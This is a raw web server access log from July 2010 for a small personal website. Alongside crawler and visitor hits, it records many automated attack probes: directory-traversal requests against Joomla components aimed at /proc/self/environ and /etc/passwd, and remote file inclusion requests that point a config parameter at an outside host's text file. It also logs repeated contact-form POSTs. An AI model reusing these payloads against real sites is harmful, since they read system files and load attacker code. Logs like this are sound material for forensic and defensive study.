140.128.174.15 - - [01/Jul/2010:00:19:41 -0500] "GET /logs/access_log.1275091200//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
140.128.174.15 - - [01/Jul/2010:00:19:42 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
140.128.174.15 - - [01/Jul/2010:00:19:42 -0500] "GET /logs/access_log.1275091200//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
140.128.174.15 - - [01/Jul/2010:00:19:42 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
140.128.174.15 - - [01/Jul/2010:00:19:42 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
140.128.174.15 - - [01/Jul/2010:00:19:43 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
140.128.174.15 - - [01/Jul/2010:00:19:47 -0500] "GET /logs/access_log.1276732800//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
140.128.174.15 - - [01/Jul/2010:00:19:50 -0500] "GET /logs/access_log.1276732800//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
202.146.215.116 - - [01/Jul/2010:00:20:35 -0500] "GET /logs/access_log.1276819200/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
67.195.112.180 - - [01/Jul/2010:00:23:03 -0500] "GET /logs/access_log.1197072000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.185 - - [01/Jul/2010:00:23:36 -0500] "GET /tattoo/chinchil.JPG HTTP/1.1" 200 22675 "-""Googlebot-Image/1.0"
89.212.6.4 - - [01/Jul/2010:00:26:31 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:26:31 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:26:31 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:26:32 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:26:32 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:26:32 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:26:32 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:26:32 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:26:32 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:26:32 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:26:32 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:26:32 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:26:32 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:26:33 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:26:33 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:26:33 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:26:33 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:00:26:33 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.195.112.180 - - [01/Jul/2010:00:30:25 -0500] "GET /logs/access_log.1268956800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.238.172.21 - - [01/Jul/2010:00:32:13 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
87.238.172.21 - - [01/Jul/2010:00:32:13 -0500] "GET /logs/access_log.1274572800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
87.238.172.21 - - [01/Jul/2010:00:32:13 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
66.191.139.210 - - [01/Jul/2010:00:32:22 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
66.191.139.210 - - [01/Jul/2010:00:32:22 -0500] "GET /logs/access_log.1274572800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
66.191.139.210 - - [01/Jul/2010:00:32:22 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
66.191.139.210 - - [01/Jul/2010:00:32:23 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
66.191.139.210 - - [01/Jul/2010:00:32:23 -0500] "GET /logs/access_log.1274572800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
66.191.139.210 - - [01/Jul/2010:00:32:23 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
67.195.112.180 - - [01/Jul/2010:00:32:40 -0500] "GET /logs/access_log.1185667200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [01/Jul/2010:00:33:13 -0500] "GET /logs/access_log.1233014400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
94.124.120.73 - - [01/Jul/2010:00:37:46 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
94.124.120.73 - - [01/Jul/2010:00:37:46 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
94.124.120.73 - - [01/Jul/2010:00:37:46 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
94.124.120.73 - - [01/Jul/2010:00:37:46 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
94.124.120.73 - - [01/Jul/2010:00:37:46 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
94.124.120.73 - - [01/Jul/2010:00:37:46 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
94.124.120.73 - - [01/Jul/2010:00:37:47 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
94.124.120.73 - - [01/Jul/2010:00:37:47 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
94.124.120.73 - - [01/Jul/2010:00:37:47 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
94.124.120.73 - - [01/Jul/2010:00:37:47 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
94.124.120.73 - - [01/Jul/2010:00:37:47 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
94.124.120.73 - - [01/Jul/2010:00:37:47 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
94.124.120.73 - - [01/Jul/2010:00:37:48 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
94.124.120.73 - - [01/Jul/2010:00:37:48 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
94.124.120.73 - - [01/Jul/2010:00:37:48 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
81.224.97.158 - - [01/Jul/2010:00:37:48 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://www.google.se/search?q=Outfit+for+Bishops+and+Cardinals&hl=sv&client=firefox-a&hs=eRX&rls=org.mozilla:sv-SE:official&ei=diQsTOCjD8OUOK61-JYJ&start=10&sa=N""Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 (.NET CLR 3.5.30729)"
94.124.120.73 - - [01/Jul/2010:00:37:48 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
94.124.120.73 - - [01/Jul/2010:00:37:48 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
94.124.120.73 - - [01/Jul/2010:00:37:48 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
81.224.97.158 - - [01/Jul/2010:00:37:48 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://www.google.se/search?q=Outfit+for+Bishops+and+Cardinals&hl=sv&client=firefox-a&hs=eRX&rls=org.mozilla:sv-SE:official&ei=diQsTOCjD8OUOK61-JYJ&start=10&sa=N""Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 (.NET CLR 3.5.30729)"
81.224.97.158 - - [01/Jul/2010:00:37:50 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 (.NET CLR 3.5.30729)"
81.224.97.158 - - [01/Jul/2010:00:37:53 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 (.NET CLR 3.5.30729)"
204.236.235.245 - - [01/Jul/2010:00:37:55 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
204.236.235.245 - - [01/Jul/2010:00:37:55 -0500] "GET /logs/access_log.1217462400 HTTP/1.0" 404 298 "-""ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
119.73.183.190 - - [01/Jul/2010:00:38:02 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
119.73.183.190 - - [01/Jul/2010:00:38:02 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
119.73.183.190 - - [01/Jul/2010:00:38:02 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
119.73.183.190 - - [01/Jul/2010:00:38:02 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
119.73.183.190 - - [01/Jul/2010:00:38:02 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
66.191.139.210 - - [01/Jul/2010:00:39:23 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
66.191.139.210 - - [01/Jul/2010:00:39:23 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
66.191.139.210 - - [01/Jul/2010:00:39:23 -0500] "GET /logs/access_log.1274572800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
66.191.139.210 - - [01/Jul/2010:00:39:30 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
66.191.139.210 - - [01/Jul/2010:00:39:30 -0500] "GET /logs/access_log.1274572800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
66.191.139.210 - - [01/Jul/2010:00:39:30 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
87.238.172.21 - - [01/Jul/2010:00:39:31 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
87.238.172.21 - - [01/Jul/2010:00:39:31 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
87.238.172.21 - - [01/Jul/2010:00:39:31 -0500] "GET /logs/access_log.1274572800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
92.246.14.10 - - [01/Jul/2010:00:47:21 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:00:47:21 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:00:47:21 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:00:47:21 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:00:47:21 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:00:47:21 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:00:47:21 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:00:47:21 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:00:47:22 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:00:47:22 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:00:47:22 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:00:47:22 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:00:47:22 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:00:47:22 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:00:47:22 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:00:47:22 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:00:47:22 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:00:47:23 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.195.112.180 - - [01/Jul/2010:00:50:08 -0500] "GET /artwork/music.htm HTTP/1.0" 200 577 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.115.111.248 - - [01/Jul/2010:00:56:52 -0500] "GET /logs/access_log.1237075200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jul/2010:00:56:53 -0500] "GET /logs/access_log.1237248000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jul/2010:00:56:55 -0500] "GET /logs/access_log.1237334400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jul/2010:00:56:57 -0500] "GET /logs/access_log.1237420800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jul/2010:00:56:59 -0500] "GET /logs/access_log.1237593600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jul/2010:00:57:01 -0500] "GET /logs/access_log.1237680000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jul/2010:00:57:03 -0500] "GET /logs/access_log.1237766400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jul/2010:00:57:05 -0500] "GET /logs/access_log.1237852800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jul/2010:00:57:07 -0500] "GET /logs/access_log.1237939200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jul/2010:00:57:09 -0500] "GET /logs/access_log.1238025600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
64.207.204.37 - - [01/Jul/2010:00:59:08 -0500] "GET /logs/access_log.1274832000//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
64.207.204.37 - - [01/Jul/2010:00:59:09 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
64.207.204.37 - - [01/Jul/2010:00:59:09 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
89.212.6.4 - - [01/Jul/2010:01:01:46 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:01:46 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:01:46 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:01:46 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:01:46 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:01:47 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:01:47 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:01:47 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:01:47 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:01:47 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:01:47 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:01:47 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:01:47 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:01:47 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:01:47 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:01:48 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:01:48 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:01:48 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
202.62.103.120 - - [01/Jul/2010:01:03:41 -0500] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
202.62.103.120 - - [01/Jul/2010:01:04:48 -0500] "GET /*?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.834"
202.62.103.120 - - [01/Jul/2010:01:05:58 -0500] "GET /*?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.834"
92.246.14.10 - - [01/Jul/2010:01:09:09 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:01:09:09 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:01:09:09 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:01:09:10 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:01:09:10 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:01:09:10 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:01:09:10 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:01:09:10 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:01:09:10 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:01:09:10 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:01:09:10 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:01:09:11 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:01:09:11 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:01:09:11 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:01:09:11 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:01:09:11 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:01:09:11 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:01:09:11 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.243.84.187 - - [01/Jul/2010:01:11:30 -0500] "GET /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder= HTTP/1.0" 404 349 "tomdolan.pconline.com/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder=""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
207.46.13.46 - - [01/Jul/2010:01:13:56 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.46 - - [01/Jul/2010:01:14:46 -0500] "GET /logs/access_log.1266105600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
24.77.166.66 - - [01/Jul/2010:01:17:56 -0500] "GET /logs/access_log.1277164800/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
24.77.166.66 - - [01/Jul/2010:01:17:57 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
24.77.166.66 - - [01/Jul/2010:01:17:57 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
24.77.166.66 - - [01/Jul/2010:01:18:05 -0500] "GET /logs/access_log.1274832000/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
67.195.112.180 - - [01/Jul/2010:01:18:44 -0500] "GET /logs/access_log.1202515200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [01/Jul/2010:01:19:49 -0500] "GET /logs/access_log.1232668800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.212.6.4 - - [01/Jul/2010:01:20:38 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:20:38 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:20:38 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
89.212.6.4 - - [01/Jul/2010:01:20:39 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
